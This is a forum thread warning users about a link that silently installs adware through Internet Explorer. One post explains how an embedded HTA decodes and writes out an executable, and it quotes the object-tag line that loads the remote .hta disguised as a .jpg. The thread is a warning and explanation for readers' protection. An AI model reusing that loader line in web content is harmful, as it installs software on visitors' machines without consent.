• We’re currently investigating an issue related to the forum theme and styling that is impacting page layout and visual formatting. The problem has been identified, and we are actively working on a resolution. There is no impact to user data or functionality, this is strictly a front-end display issue. We’ll post an update once the fix has been deployed. Thanks for your patience while we get this sorted.

Why IE sucks.

CTho9305

Elite Member
DO NOT CLICK THIS LINK if you use IE. It hijacks your AIM profile and installs adware. From looking at the source, it looks like it gets IE to run an hta (html application, they run with normal user privileges and can access files) which has an EXE stored in it (v1, v2, v3 in the .hta) and then uses that encoded EXE to own you.
 
Ok, so what the HTA does:
start minimized
force the window to move offscreen
disable error messages
disable right-clicks
convert the hex-encoded EXE data to the actual binary and write it.

The HTA is probably launched from that link by this:
"<object data=http://www.realphx.com/project/iav.hta?.jpg>"
I'm guessing the .jpg at the end makes the crappy browser assume the file is safe and run the HTA without intervention.

Originally posted by: BigJ
don't they give a link on their site to remove it also?
Does that make IE's retarded security model any more acceptable? All you have to do is copy their site, put in a really malicious EXE, and NOT provide an uninstall to really abuse it.
 
Originally posted by: CTho9305
DO NOT CLICK THIS LINK if you use IE. It hijacks your AIM profile and installs adware. From looking at the source, it looks like it gets IE to run an hta (html application, they run with normal user privileges and can access files) which has an EXE stored in it (v1, v2, v3 in the .hta) and then uses that encoded EXE to own you.

Funny, I use IE, clicked on the link and no adware...

Why?

Because I RTFM and it showed me how not to surf the web like a complete gnubie and use some common sense. You wouldn't let a complete stranger in your house and let them do whatever they want would you? No? Then why not exercise the same common sense with your browser? 😉

-FP
 
Originally posted by: FreshPrince
Originally posted by: CTho9305
DO NOT CLICK THIS LINK if you use IE. It hijacks your AIM profile and installs adware. From looking at the source, it looks like it gets IE to run an hta (html application, they run with normal user privileges and can access files) which has an EXE stored in it (v1, v2, v3 in the .hta) and then uses that encoded EXE to own you.

Funny, I use IE, clicked on the link and no adware...

Why?

Because I RTFM and it showed me how not to surf the web like a complete gnubie and use some common sense. You wouldn't let a complete stranger in your house and let them do whatever they want would you? No? Then why not exercise the same common sense with your browser? 😉

-FP

I use a browser that doesn't require screwing with settings to get even remotely secure. Glad you didn't get hijacked 😉.
 
YAIEBT: Yet another internet explorer bashing thread?
rolleye.gif


<- using IE, nothing happened.
 
Hmm...

I don't want to click it and find out. 😛

But I would like to know if my IE is secure. How can I check?
 
Install prompt. I clicked no. Popups galore. ALT F4. My computer is the same as it was before I clicked the link.

If more people knew it was this simple, there would be less money in fixing software problems for customers. So, basically, I like idiots.
 
Back
Top